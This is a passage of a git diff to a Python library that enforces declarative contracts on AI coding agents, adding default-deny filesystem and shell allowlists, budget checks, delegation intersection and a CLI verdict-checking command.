type=click.Choice(["basic", "coding"], case_sensitive=False), + default="basic", + show_default=True, + help="Template to use when not generating from traces.", +) +def init( + trace_path: Optional[str], + agent_name: Optional[str], + agent_version: Optional[str], + output_path: Optional[str], + template: str, +) -> None: """Generate a contract skeleton (optionally from execution traces).""" from agent_contracts.init_from_trace import generate_contract_yaml @@ -165,26 +191,73 @@ def init(trace_path: Optional[str], agent_name: Optional[str], agent_version: Op trace_path, agent_name=agent_name, agent_version=agent_version ) else: - # Generate a minimal template - template = { - "agent_contract": "0.1.0", - "identity": { - "name": agent_name or "my-agent", - "version": agent_version or "0.1.0", - "description": "TODO: Describe what this agent does.", - }, - "contract": { - "postconditions": [ - { - "name": "produces_output", - "check": "output is not None", - "enforcement": "sync_block", - "severity": "critical", + if template == "coding": + payload = { + "agent_contract": "0.1.0", + "identity": { + "name": agent_name or "repo-build-agent", + "version": agent_version or "0.1.0", + "description": "Repo-local coding/build agent with fail-closed scopes.", + }, + "effects": { + "authorized": { + "filesystem": { + "read": ["src/**", "tests/**", "README.md", "pyproject.toml"], + "write": ["src/**", "tests/**", "README.md"], + }, + "shell": { + "commands": [ + "python -m pytest *", + "python -m ruff check *", + ] + }, + "tools": [], + "network": [], + "state_writes": [], } - ] - }, - } - result = yaml.dump(template, sort_keys=False, default_flow_style=False) + }, + "resources": { + "budgets": { + "max_tokens": 50000, + "max_tool_calls": 20, + "max_shell_commands": 10, + "max_duration_seconds": 1800, + } + }, + "observability": { + "run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json" + }, + "contract": { + "postconditions": [ + { + "name": "repo_checks_green", + "check": "checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", + "enforcement": "sync_block", + "severity": "critical", + } + ] + }, + } + else: + payload = { + "agent_contract": "0.1.0", + "identity": { + "name": agent_name or "my-agent", + "version": agent_version or "0.1.0", + "description": "TODO: Describe what this agent does.", + }, + "contract": { + "postconditions": [ + { + "name": "produces_output", + "check": "output is not None", + "enforcement": "sync_block", + "severity": "critical", + } + ] + }, + } + result = yaml.dump(payload, sort_keys=False, default_flow_style=False) if output_path: Path(output_path).write_text(result, encoding="utf-8") @@ -193,10 +266,46 @@ def init(trace_path: Optional[str], agent_name: Optional[str], agent_version: Op click.echo(result) +@main.command("check-verdict") +@click.argument("verdict_path", type=click.Path(exists=True)) +@click.option("--json-output", "-j", is_flag=True, help="Output as JSON.") +@click.option("--fail-on-warn", is_flag=True, help="Return non-zero for warn outcomes.") +def check_verdict(verdict_path: str, json_output: bool, fail_on_warn: bool) -> None: + """Inspect a verdict artifact and return a CI-friendly exit code.""" + verdict = load_verdict_artifact(verdict_path) + outcome = verdict.get("outcome", "unknown") + final_gate = verdict.get("final_gate", "unknown") + should_fail = outcome in {"blocked", "fail"} or (fail_on_warn and outcome == "warn") + + if json_output: + click.echo(json.dumps(verdict, indent=2)) + else: + click.echo(f"Outcome: {outcome}") + click.echo(f"Final gate: {final_gate}") + violations = verdict.get("violations", []) + checks = verdict.get("checks", []) + if violations: + click.echo("\nViolations:") + for violation in violations: + click.echo(f" - {violation.get('violated_clause')}") + if checks: + click.echo("\nChecks:") + for check in checks: + click.echo(f" - {check.get('name')}: {check.get('status')}") + + if should_fail: + sys.exit(1) + + @main.command() @click.argument("contract_path", type=click.Path(exists=True)) -@click.option("--eval-suite", "-e", "eval_dir", type=click.Path(exists=True), - help="Directory containing eval test cases (JSONL).") +@click.option( + "--eval-suite", + "-e", + "eval_dir", + type=click.Path(exists=True), + help="Directory containing eval test cases (JSONL).", +) def test(contract_path: str, eval_dir: Optional[str]) -> None: """Run eval suite against contract postconditions.""" from agent_contracts.loader import ContractLoadError, load_contract @@ -204,15 +313,17 @@ def test(contract_path: str, eval_dir: Optional[str]) -> None: try: contract = load_contract(contract_path) - except ContractLoadError as e: - click.echo(f"Error loading contract: {e}", err=True) + except ContractLoadError as exc: + click.echo(f"Error loading contract: {exc}", err=True) sys.exit(1) if not eval_dir: click.echo(f"Contract '{contract.identity.name}' loaded (Tier {contract.tier}).") click.echo(f"Postconditions: {len(contract.postconditions)}") - for pc in contract.postconditions: - click.echo(f" - {pc.name} ({pc.enforcement}): {pc.check}") + for postcondition in contract.postconditions: + click.echo( + f" - {postcondition.name} ({postcondition.enforcement}): {postcondition.check}" + ) click.echo("\nNo eval suite specified. Use --eval-suite to run tests.") return @@ -226,10 +337,10 @@ def test(contract_path: str, eval_dir: Optional[str]) -> None: passed = 0 failed = 0 - for tf in test_files: - click.echo(f"\n--- {tf.name} ---") - with open(tf, encoding="utf-8") as f: - for line_num, line in enumerate(f, 1): + for test_file in test_files: + click.echo(f"\n--- {test_file.name} ---") + with open(test_file, encoding="utf-8") as handle: + for line_num, line in enumerate(handle, 1): line = line.strip() if not line: continue @@ -238,24 +349,24 @@ def test(contract_path: str, eval_dir: Optional[str]) -> None: except json.JSONDecodeError: click.echo(f" Line {line_num}: SKIP (invalid JSON)") continue - output = case.get("output", case.get("result")) total += 1 try: - results = evaluate_postconditions( - contract.postconditions, output - ) - all_passed = all(r.passed for r in results) - if all_passed: + results = evaluate_postconditions(contract.postconditions, output) + if all(result.passed for result in results): passed += 1 click.echo(f" Case {line_num}: PASS") else: failed += 1 - failed_names = [r.postcondition.name for r in results if not r.passed] + failed_names = [ + result.postcondition.name for result in results if not result.passed + ] click.echo(f" Case {line_num}: FAIL ({', '.join(failed_names)})") - except PostconditionError as e: + except PostconditionError as exc: failed += 1 - click.echo(f" Case {line_num}: FAIL (blocked: {e.postcondition.name})") + click.echo( + f" Case {line_num}: FAIL (blocked: {exc.postcondition.name})" + ) click.echo(f"\nResults: {passed}/{total} passed, {failed} failed") if failed > 0: diff --git a/src/agent_contracts/composition.py b/src/agent_contracts/composition.py index c04d3a5..4c2ba92 100644 --- a/src/agent_contracts/composition.py +++ b/src/agent_contracts/composition.py @@ -18,24 +18,18 @@ @dataclass class SchemaGap: - """A gap between producer output and consumer input schemas.""" - field_path: str issue: str @dataclass class CapabilityGap: - """A tool the consumer needs but the producer doesn't authorize for delegation.""" - tool: str reason: str @dataclass class BudgetGap: - """A budget field where the consumer exceeds what the producer allows.""" - budget_type: str producer_limit: Optional[float] consumer_limit: Optional[float] @@ -44,8 +38,6 @@ class BudgetGap: @dataclass class CompatibilityReport: - """Full compatibility report between two contracts.""" - compatible: bool producer: str consumer: str @@ -56,7 +48,6 @@ class CompatibilityReport: warnings: List[str] = field(default_factory=list) def summary(self) -> str: - """One-line summary of compatibility.""" if self.compatible: warnings = f" ({len(self.warnings)} warnings)" if self.warnings else "" return f"Compatible: {self.producer} -> {self.consumer}{warnings}" @@ -73,21 +64,18 @@ def _check_schema_compatibility( producer_output: Optional[Dict[str, Any]], consumer_input: Optional[Dict[str, Any]], ) -> List[SchemaGap]: - """Check if producer output schema is assignable to consumer input schema. - - This is a structural compatibility check, not full JSON Schema subtyping. - Checks that required consumer input fields exist in producer output. - """ gaps: List[SchemaGap] = [] if consumer_input is None: - return gaps # Consumer accepts anything + return gaps if producer_output is None: - gaps.append(SchemaGap( - field_path="(root)", - issue="Consumer expects structured input but producer has no output schema.", - )) + gaps.append( + SchemaGap( + field_path="(root)", + issue="Consumer expects structured input but producer has no output schema.", + ) + ) return gaps consumer_required = consumer_input.get("required", []) @@ -95,60 +83,69 @@ def _check_schema_compatibility( for req_field in consumer_required: if req_field not in producer_props: - gaps.append(SchemaGap( - field_path=req_field, - issue=f"Consumer requires field '{req_field}' but producer output schema doesn't define it.", - )) + gaps.append( + SchemaGap( + field_path=req_field, + issue=( + f"Consumer requires field '{req_field}' but producer output schema " + "doesn't define it." + ), + ) + ) - # Check type compatibility for shared fields consumer_props = consumer_input.get("properties", {}) for field_name, consumer_field in consumer_props.items(): if field_name in producer_props: producer_type = producer_props[field_name].get("type") consumer_type = consumer_field.get("type") if producer_type and consumer_type and producer_type != consumer_type: - gaps.append(SchemaGap( - field_path=field_name, - issue=f"Type mismatch: producer outputs '{producer_type}' but consumer expects '{consumer_type}'.", - )) + gaps.append( + SchemaGap( + field_path=field_name, + issue=( + f"Type mismatch: producer outputs '{producer_type}' " + f"but consumer expects '{consumer_type}'." + ), + ) + ) return gaps -def _check_capability_compatibility( - producer: Contract, consumer: Contract -) -> List[CapabilityGap]: - """Check if the consumer's tool needs are covered by the producer's delegation.""" +def _check_capability_compatibility(producer: Contract, consumer: Contract) -> List[CapabilityGap]: gaps: List[CapabilityGap] = [] if consumer.effects_authorized is None: return gaps - # If producer has delegation rules, check allowed agents if producer.delegation and producer.delegation.allowed_agents is not None: if consumer.identity.name not in producer.delegation.allowed_agents: - gaps.append(CapabilityGap( - tool="(delegation)", - reason=f"Consumer '{consumer.identity.name}' not in producer's allowed_agents list.", - )) + gaps.append( + CapabilityGap( + tool="(delegation)", + reason=( + f"Consumer '{consumer.identity.name}' not in producer's " + "allowed_agents list." + ), + ) + ) - # If producer has authorized effects and attenuates during delegation, - # check that consumer's needed tools are within producer's scope if producer.effects_authorized and consumer.effects_authorized: for tool in consumer.effects_authorized.tools: if not matches_any(tool, producer.effects_authorized.tools): - gaps.append(CapabilityGap( - tool=tool, - reason=f"Consumer needs tool '{tool}' but producer doesn't authorize it.", - )) + gaps.append( + CapabilityGap( + tool=tool, + reason=( + f"Consumer needs tool '{tool}' but producer doesn't authorize it." + ), + ) + ) return gaps -def _check_budget_compatibility( - producer: Contract, consumer: Contract -) -> List[BudgetGap]: - """Check if consumer budget fits within producer budget.""" +def _check_budget_compatibility(producer: Contract, consumer: Contract) -> List[BudgetGap]: gaps: List[BudgetGap] = [] if producer.budgets is None or consumer.budgets is None: @@ -158,41 +155,50 @@ def _check_budget_compatibility( ("max_cost_usd", producer.budgets.max_cost_usd, consumer.budgets.max_cost_usd), ("max_tokens", producer.budgets.max_tokens, consumer.budgets.max_tokens), ("max_tool_calls", producer.budgets.max_tool_calls, consumer.budgets.max_tool_calls), - ("max_duration_seconds", producer.budgets.max_duration_seconds, consumer.budgets.max_duration_seconds), + ( + "max_duration_seconds", + producer.budgets.max_duration_seconds, + consumer.budgets.max_duration_seconds, + ), + ( + "max_shell_commands", + producer.budgets.max_shell_commands, + consumer.budgets.max_shell_commands, + ), ] for budget_type, prod_limit, cons_limit in checks: if prod_limit is not None and cons_limit is not None: if cons_limit > prod_limit: - gaps.append(BudgetGap( + gaps.append( + BudgetGap( + budget_type=budget_type, + producer_limit=float(prod_limit), + consumer_limit=float(cons_limit), + issue=( + f"Consumer {budget_type}={cons_limit} exceeds producer " + f"limit={prod_limit}." + ), + ) + ) + elif prod_limit is not None and cons_limit is None: + gaps.append( + BudgetGap( budget_type=budget_type, producer_limit=float(prod_limit), - consumer_limit=float(cons_limit), - issue=f"Consumer {budget_type}={cons_limit} exceeds producer limit={prod_limit}.", - )) - elif prod_limit is not None and cons_limit is None: - gaps.append(BudgetGap( - budget_type=budget_type, - producer_limit=float(prod_limit), - consumer_limit=None, - issue=f"Producer limits {budget_type}={prod_limit} but consumer has no limit.", - )) + consumer_limit=None, + issue=( + f"Producer limits {budget_type}={prod_limit} but consumer has no limit." + ), + ) + ) return gaps def check_compatibility(producer: Contract, consumer: Contract) -> CompatibilityReport: - """Compute the Contract Differential between a producer and consumer. - - Checks schema assignability, capability coverage, budget fit, - and effect authorization compliance. - """ - schema_gaps = _check_schema_compatibility( - producer.output_schema, consumer.input_schema - ) - + schema_gaps = _check_schema_compatibility(producer.output_schema, consumer.input_schema) capability_gaps = _check_capability_compatibility(producer, consumer) - budget_gaps = _check_budget_compatibility(producer, consumer) effect_violations: List[str] = [] @@ -203,9 +209,13 @@ def check_compatibility(producer: Contract, consumer: Contract) -> Compatibility warnings: List[str] = [] if producer.tier < 2: - warnings.append(f"Producer '{producer.identity.name}' is Tier {producer.tier}; Tier 2 recommended for composition.") + warnings.append( + f"Producer '{producer.identity.name}' is Tier {producer.tier}; Tier 2 recommended for composition." + ) if consumer.tier < 2: - warnings.append(f"Consumer '{consumer.identity.name}' is Tier {consumer.tier}; Tier 2 recommended for composition.") + warnings.append( + f"Consumer '{consumer.identity.name}' is Tier {consumer.tier}; Tier 2 recommended for composition." + ) compatible = ( len(schema_gaps) == 0 diff --git a/src/agent_contracts/effects.py b/src/agent_contracts/effects.py index 557561d..a207faf 100644 --- a/src/agent_contracts/effects.py +++ b/src/agent_contracts/effects.py @@ -1,4 +1,4 @@ -"""Effect authorization — default-deny tool gating with glob pattern matching. +"""Effect authorization for coding/build agents. Authorized effects compose via intersection during delegation. Declared effects compose via union for auditing. @@ -8,64 +8,111 @@ from __future__ import annotations import fnmatch -from typing import List, Optional, Set +from pathlib import Path +from typing import List, Optional, Sequence, Set -from agent_contracts.types import EffectsAuthorized, EffectsDeclared +from agent_contracts.types import ( + EffectsAuthorized, + EffectsDeclared, + FilesystemAuthorization, + ShellAuthorization, +) class EffectDeniedError(Exception): """Raised when a tool call or effect is not authorized.""" - def __init__(self, effect_type: str, name: str, allowed: List[str]) -> None: + def __init__(self, effect_type: str, name: str, allowed: Sequence[str]) -> None: self.effect_type = effect_type self.name = name - self.allowed = allowed + self.allowed = list(allowed) super().__init__( f"{effect_type} '{name}' denied. " - f"Authorized: {allowed if allowed else '(none — default deny)'}" + f"Authorized: {list(allowed) if allowed else '(none — default deny)'}" ) -def matches_any(name: str, patterns: List[str]) -> bool: +def matches_any(name: str, patterns: Sequence[str]) -> bool: """Check if a name matches any of the given glob patterns.""" return any(fnmatch.fnmatch(name, pattern) for pattern in patterns) -class EffectGuard: - """Enforces the effects.authorized allowlist (default-deny). +def _intersect_lists(parent_list: Sequence[str], child_list: Sequence[str]) -> List[str]: + result: List[str] = [] + for child_pattern in child_list: + if matches_any(child_pattern, parent_list) or any( + fnmatch.fnmatch(parent_pattern, child_pattern) for parent_pattern in parent_list + ): + result.append(child_pattern) + return result - All checks are O(n) where n = number of patterns. For production - workloads with large allowlists, consider pre-compiling patterns. - """ - def __init__(self, authorized: Optional[EffectsAuthorized] = None) -> None: +class EffectGuard: + """Enforces the effects.authorized allowlist (default-deny when configured).""" + + def __init__( + self, + authorized: Optional[EffectsAuthorized] = None, + *, + repo_root: Optional[Path] = None, + ) -> None: self._authorized = authorized + self._repo_root = repo_root.resolve() if repo_root is not None else Path.cwd().resolve() @property def is_configured(self) -> bool: - """Whether effect authorization is configured.""" + """Whether effect authorization was configured on the contract.""" return self._authorized is not None + def _path_candidates(self, path: str) -> List[str]: + raw = Path(path) + absolute = raw if raw.is_absolute() else (self._repo_root / raw) + absolute = absolute.resolve() + candidates: List[str] = [path, absolute.as_posix()] + try: + candidates.append(absolute.relative_to(self._repo_root).as_posix()) + except ValueError: + pass + return list(dict.fromkeys(candidates)) + + def _filesystem_matches(self, path: str, patterns: Sequence[str]) -> bool: + return any(matches_any(candidate, patterns) for candidate in self._path_candidates(path)) + + def _normalized_command(self, command: str) -> str: + return " ".join(command.strip().split()) + def check_tool(self, tool_name: str) -> bool: - """Check if a tool call is authorized. Returns True if allowed.""" if self._authorized is None: - return True # No authorization configured = allow all + return True return matches_any(tool_name, self._authorized.tools) def check_network(self, url: str) -> bool: - """Check if a network request is authorized.""" if self._authorized is None: return True return matches_any(url, self._authorized.network) def check_state_write(self, scope: str) -> bool: - """Check if a state write is authorized.""" if self._authorized is None: return True return matches_any(scope, self._authorized.state_writes) + def check_file_read(self, path: str) -> bool: + if self._authorized is None or self._authorized.filesystem is None: + return True + return self._filesystem_matches(path, self._authorized.filesystem.read) + + def check_file_write(self, path: str) -> bool: + if self._authorized is None or self._authorized.filesystem is None: + return True + return self._filesystem_matches(path, self._authorized.filesystem.write) + + def check_shell_command(self, command: str) -> bool: + if self._authorized is None or self._authorized.shell is None: + return True + normalized = self._normalized_command(command) + return matches_any(normalized, self._authorized.shell.commands) + def require_tool(self, tool_name: str) -> None: - """Assert a tool call is authorized; raise EffectDeniedError if not.""" if not self.check_tool(tool_name): raise EffectDeniedError( "tool", @@ -74,7 +121,6 @@ def require_tool(self, tool_name: str) -> None: ) def require_network(self, url: str) -> None: - """Assert a network request is authorized.""" if not self.check_network(url): raise EffectDeniedError( "network", @@ -83,7 +129,6 @@ def require_network(self, url: str) -> None: ) def require_state_write(self, scope: str) -> None: - """Assert a state write is authorized.""" if not self.check_state_write(scope): raise EffectDeniedError( "state_write", @@ -91,30 +136,52 @@ def require_state_write(self, scope: str) -> None: self._authorized.state_writes if self._authorized else [], ) + def require_file_read(self, path: str) -> None: + if not self.check_file_read(path): + allowed = [] + if self._authorized is not None and self._authorized.filesystem is not None: + allowed = self._authorized.filesystem.read + raise EffectDeniedError("filesystem.read", path, allowed) + + def require_file_write(self, path: str) -> None: + if not self.check_file_write(path): + allowed = [] + if self._authorized is not None and self._authorized.filesystem is not None: + allowed = self._authorized.filesystem.write + raise EffectDeniedError("filesystem.write", path, allowed) + + def require_shell_command(self, command: str) -> None: + if not self.check_shell_command(command): + allowed = [] + if self._authorized is not None and self._authorized.shell is not None: + allowed = self._authorized.shell.commands + raise EffectDeniedError("shell.command", self._normalized_command(command), allowed) + + +def intersect_authorized(parent: EffectsAuthorized, child: EffectsAuthorized) -> EffectsAuthorized: + """Compute intersection of authorized effects (capability attenuation for delegation).""" + + filesystem: Optional[FilesystemAuthorization] = None + if parent.filesystem is not None or child.filesystem is not None: + parent_fs = parent.filesystem or FilesystemAuthorization() + child_fs = child.filesystem or FilesystemAuthorization() + filesystem = FilesystemAuthorization( + read=_intersect_lists(parent_fs.read, child_fs.read), + write=_intersect_lists(parent_fs.write, child_fs.write), + ) -def intersect_authorized( - parent: EffectsAuthorized, child: EffectsAuthorized -) -> EffectsAuthorized: - """Compute intersection of authorized effects (capability attenuation for delegation). - - The child can only use effects that BOTH parent and child authorize. - Uses glob matching: a child pattern is kept only if it matches at least - one parent pattern, or vice versa. - """ - - def _intersect_lists(parent_list: List[str], child_list: List[str]) -> List[str]: - result: List[str] = [] - for c in child_list: - if matches_any(c, parent_list) or any( - fnmatch.fnmatch(p, c) for p in parent_list - ): - result.append(c) - return result + shell: Optional[ShellAuthorization] = None + if parent.shell is not None or child.shell is not None: + parent_shell = parent.shell or ShellAuthorization() + child_shell = child.shell or ShellAuthorization() + shell = ShellAuthorization(commands=_intersect_lists(parent_shell.commands, child_shell.commands)) return EffectsAuthorized( tools=_intersect_lists(parent.tools, child.tools), network=_intersect_lists(parent.network, child.network), state_writes=_intersect_lists(parent.state_writes, child.state_writes), + filesystem=filesystem, + shell=shell, ) @@ -140,10 +207,7 @@ def _union_unique(x: List[str], y: List[str]) -> List[str]: def validate_declared_subset( declared: EffectsDeclared, authorized: EffectsAuthorized ) -> List[str]: - """Validate that declared effects are a subset of authorized effects. - - Returns a list of violation messages. Empty = valid. - """ + """Validate that declared effects are a subset of authorized effects.""" violations: List[str] = [] for tool in declared.tools: if not matches_any(tool, authorized.tools): diff --git a/src/agent_contracts/enforcer.py b/src/agent_contracts/enforcer.py index 941dbc3..0a73daf 100644 --- a/src/agent_contracts/enforcer.py +++ b/src/agent_contracts/enforcer.py @@ -1,26 +1,24 @@ -"""Runtime enforcement middleware — the unified enforcement layer. -Wires together effects, budgets, postconditions, and violations into a -single enforcement flow. Supports three usage patterns: - -1. Decorator: @enforce_contract("path/to/contract.yaml") -2. Context manager: with ContractEnforcer(contract) as enforcer: ... -3. Explicit API: enforcer.check_tool_call(name, args) -""" +"""Runtime enforcement middleware for repo-local coding-agent contracts.""" from __future__ import annotations import functools import inspect +import json +import uuid +from dataclasses import dataclass, field +from datetime import datetime, timezone from pathlib import Path -from typing import Any, Callable, Dict, List, Optional, TypeVar, Union +from typing import Any, Callable, Dict, List, Literal, Optional, TypeVar, Union, cast import jsonschema -from agent_contracts.budgets import BudgetExceededError, BudgetTracker +from agent_contracts.budgets import BudgetExceededError, BudgetSnapshot, BudgetTracker from agent_contracts.effects import EffectGuard from agent_contracts.loader import load_contract from agent_contracts.postconditions import ( + PostconditionError, PostconditionResult, PreconditionError, PreconditionResult, @@ -31,6 +29,79 @@ from agent_contracts.violations import ViolationEmitter, ViolationEvent F = TypeVar("F", bound=Callable[..., Any]) +CheckStatus = Literal["pass", "warn", "fail", "blocked", "skipped"] + + +@dataclass(frozen=True) +class RunCheckResult: + """Result for a named repo check or final gate check.""" + + name: str + status: CheckStatus + required: bool = True + exit_code: Optional[int] = None + detail: Optional[str] = None + evidence: Dict[str, Any] = field(default_factory=dict) + + def to_dict(self) -> Dict[str, Any]: + data: Dict[str, Any] = { + "name": self.name, + "status": self.status, + "required": self.required, + } + if self.exit_code is not None: + data["exit_code"] = self.exit_code + if self.detail is not None: + data["detail"] = self.detail + if self.evidence: + data["evidence"] = self.evidence + return data + + def to_context(self) -> Dict[str, Any]: + return { + "status": self.status, + "required": self.required, + "exit_code": self.exit_code, + "detail": self.detail, + } + + +@dataclass(frozen=True) +class RunVerdict: + """Durable verdict artifact for a contract-governed run.""" + + run_id: str + contract: Dict[str, Any] + host: Dict[str, Any] + outcome: Literal["pass", "warn", "blocked", "fail"] + final_gate: Literal["allowed", "blocked", "failed"] + violations: List[Dict[str, Any]] + checks: List[RunCheckResult] + budgets: Dict[str, Any] + artifacts: Dict[str, Any] + timestamp: str + warnings: List[str] = field(default_factory=list) + + def to_dict(self) -> Dict[str, Any]: + return { + "run_id": self.run_id, + "contract": self.contract, + "host": self.host, + "outcome": self.outcome, + "final_gate": self.final_gate, + "violations": self.violations, + "checks": [check.to_dict() for check in self.checks], + "budgets": self.budgets, + "artifacts": self.artifacts, + "timestamp": self.timestamp, + "warnings": self.warnings, + } + + def write_json(self, destination: Union[str, Path]) -> Path: + path = Path(destination) + path.parent.mkdir(parents=True, exist_ok=True) + path.write_text(json.dumps(self.to_dict(), indent=2, sort_keys=True), encoding="utf-8") + return path class ContractViolation(Exception): @@ -41,12 +112,13 @@ def __init__(self, message: str, event: Optional[ViolationEvent] = None) -> None self.event = event -class ContractEnforcer: - """Unified runtime enforcement for an agent contract. +def load_verdict_artifact(source: Union[str, Path]) -> Dict[str, Any]: + """Load a JSON verdict artifact from disk.""" + return cast(Dict[str, Any], json.loads(Path(source).read_text(encoding="utf-8"))) - Enforces effects (default-deny), budgets (circuit breaker), - input/output schema validation, and postconditions. - """ + +class ContractEnforcer: + """Unified runtime enforcement for an agent contract.""" def __init__( self, @@ -55,14 +127,37 @@ def __init__( violation_destination: str = "stdout", violation_callback: Optional[Callable[[ViolationEvent], None]] = None, cost_callback: Optional[Callable[[], float]] = None, + repo_root: Optional[Union[str, Path]] = None, + host_name: str = "unknown", + host_version: Optional[str] = None, + run_id: Optional[str] = None, ) -> None: self._contract = contract - self._effect_guard = EffectGuard(contract.effects_authorized) + self._repo_root = self._resolve_repo_root(repo_root) + self._effect_guard = EffectGuard(contract.effects_authorized, repo_root=self._repo_root) self._budget_tracker = BudgetTracker(contract.budgets, cost_callback=cost_callback) self._emitter = ViolationEmitter( destination=violation_destination, callback=violation_callback ) self._warnings: List[str] = [] + self._checks: Dict[str, RunCheckResult] = {} + self._run_id = run_id or str(uuid.uuid4()) + self._host_name = host_name + self._host_version = host_version + self._blocked = False + self._postcondition_failure: Optional[PostconditionError] = None + self._postconditions_evaluated = False + self._last_output: Any = None + self._last_extra_context: Optional[Dict[str, Any]] = None + self._finalized_verdict: Optional[RunVerdict] = None + self._artifact_path: Optional[Path] = None + + def _resolve_repo_root(self, repo_root: Optional[Union[str, Path]]) -> Path: + if repo_root is not None: + return Path(repo_root).resolve() + if self._contract.source_path is not None: + return Path(self._contract.source_path).resolve().parent + return Path.cwd().resolve() @property def contract(self) -> Contract: @@ -80,183 +175,441 @@ def violations(self) -> List[ViolationEvent]: def warnings(self) -> List[str]: return list(self._warnings) - # --- Precondition evaluation --- + @property + def checks(self) -> List[RunCheckResult]: + return list(self._checks.values()) - def check_preconditions(self, input_data: Any) -> List[PreconditionResult]: - """Evaluate preconditions against input data before agent runs. + @property + def run_id(self) -> str: + return self._run_id + + @property + def artifact_path(self) -> Optional[Path]: + return self._artifact_path - Raises ContractViolation if any precondition fails. - Returns empty list if no preconditions are defined. - """ + @property + def finalized_verdict(self) -> Optional[RunVerdict]: + return self._finalized_verdict + + def _check_context(self) -> Dict[str, Dict[str, Any]]: + return {name: result.to_context() for name, result in self._checks.items()} + + def _record_blocked_event( + self, + *, + clause: str, + evidence: Dict[str, Any], + message: str, + severity: str = "critical", + ) -> None: + self._blocked = True + event = self._emitter.create_event( + contract_id=self._contract.identity.name, + contract_version=self._contract.identity.version, + violated_clause=clause, + evidence=evidence, + severity=severity, + enforcement="blocked", + ) + raise ContractViolation(message, event=event) + + def _record_failed_event( + self, + *, + clause: str, + evidence: Dict[str, Any], + severity: str = "critical", + ) -> None: + self._emitter.create_event( + contract_id=self._contract.identity.name, + contract_version=self._contract.identity.version, + violated_clause=clause, + evidence=evidence, + severity=severity, + enforcement="failed", + ) + + def _record_warn_event( + self, + *, + clause: str, + evidence: Dict[str, Any], + severity: str = "major", + ) -> None: + self._emitter.create_event( + contract_id=self._contract.identity.name, + contract_version=self._contract.identity.version, + violated_clause=clause, + evidence=evidence, + severity=severity, + enforcement="warned", + ) + + def check_preconditions(self, input_data: Any) -> List[PreconditionResult]: if not self._contract.preconditions: return [] try: return evaluate_preconditions( self._contract.preconditions, input_data, raise_on_failure=True ) - except PreconditionError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause=f"inputs.preconditions.{e.precondition.name}", - evidence={"check": e.precondition.check}, - severity="critical", - enforcement="blocked", + except PreconditionError as exc: + self._record_blocked_event( + clause=f"inputs.preconditions.{exc.precondition.name}", + evidence={"check": exc.precondition.check}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e - - # --- Input validation --- + raise AssertionError("unreachable") def validate_input(self, input_data: Any) -> List[str]: - """Validate input against the contract's input schema. - - Returns list of validation errors. Raises ContractViolation - if schema validation fails and enforcement is sync_block. - """ if self._contract.input_schema is None: return [] validator = jsonschema.Draft202012Validator(self._contract.input_schema) errors = [e.message for e in validator.iter_errors(input_data)] if errors: - self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="inputs.schema", - evidence={"errors": errors, "input_keys": list(input_data.keys()) if isinstance(input_data, dict) else str(type(input_data))}, - severity="major", - enforcement="blocked", + self._record_warn_event( + clause="inputs.schema", + evidence={ + "errors": errors, + "input_type": type(input_data).__name__, + }, ) return errors - # --- Tool call interception --- - def check_tool_call(self, tool_name: str, args: Optional[Dict[str, Any]] = None) -> None: - """Check if a tool call is authorized and within budget. - - Raises ContractViolation if the tool is denied or budget exceeded. - """ - # Effect check + del args if not self._effect_guard.check_tool(tool_name): - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="effects.authorized.tools", - evidence={"tool": tool_name, "authorized": self._contract.effects_authorized.tools if self._contract.effects_authorized else []}, - severity="critical", - enforcement="blocked", + self._record_blocked_event( + clause="effects.authorized.tools", + evidence={ + "tool": tool_name, + "authorized": self._contract.effects_authorized.tools + if self._contract.effects_authorized + else [], + }, + message=f"Tool '{tool_name}' not authorized by contract.", + ) + try: + self._budget_tracker.record_tool_call() + except BudgetExceededError as exc: + self._record_blocked_event( + clause=f"resources.budgets.max_{exc.budget_type}" + if exc.budget_type == "tool_calls" + else f"resources.budgets.{exc.budget_type}", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation( - f"Tool '{tool_name}' not authorized by contract.", event=event + + def check_network_request(self, url: str) -> None: + if not self._effect_guard.check_network(url): + self._record_blocked_event( + clause="effects.authorized.network", + evidence={ + "url": url, + "authorized": self._contract.effects_authorized.network + if self._contract.effects_authorized + else [], + }, + message=f"Network request '{url}' not authorized by contract.", + ) + + def check_state_write(self, scope: str) -> None: + if not self._effect_guard.check_state_write(scope): + self._record_blocked_event( + clause="effects.authorized.state_writes", + evidence={ + "scope": scope, + "authorized": self._contract.effects_authorized.state_writes + if self._contract.effects_authorized + else [], + }, + message=f"State write '{scope}' not authorized by contract.", + ) + + def check_file_read(self, path: Union[str, Path]) -> None: + candidate = str(path) + if not self._effect_guard.check_file_read(candidate): + patterns: List[str] = [] + if ( + self._contract.effects_authorized is not None + and self._contract.effects_authorized.filesystem is not None + ): + patterns = self._contract.effects_authorized.filesystem.read + self._record_blocked_event( + clause="effects.authorized.filesystem.read", + evidence={"path": candidate, "authorized": patterns}, + message=f"File read '{candidate}' not authorized by contract.", + ) + + def check_file_write(self, path: Union[str, Path]) -> None: + candidate = str(path) + if not self._effect_guard.check_file_write(candidate): + patterns: List[str] = [] + if ( + self._contract.effects_authorized is not None + and self._contract.effects_authorized.filesystem is not None + ): + patterns = self._contract.effects_authorized.filesystem.write + self._record_blocked_event( + clause="effects.authorized.filesystem.write", + evidence={"path": candidate, "authorized": patterns}, + message=f"File write '{candidate}' not authorized by contract.", ) - # Budget check — record the tool call + def check_shell_command(self, command: str) -> None: + if not self._effect_guard.check_shell_command(command): + patterns: List[str] = [] + if ( + self._contract.effects_authorized is not None + and self._contract.effects_authorized.shell is not None + ): + patterns = self._contract.effects_authorized.shell.commands + self._record_blocked_event( + clause="effects.authorized.shell.commands", + evidence={"command": command, "authorized": patterns}, + message=f"Shell command '{command}' not authorized by contract.", + ) try: - self._budget_tracker.record_tool_call() - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause=f"resources.budgets.{e.budget_type}", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + self._budget_tracker.record_shell_command() + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_shell_commands", + evidence={"current": exc.current, "limit": exc.limit}, 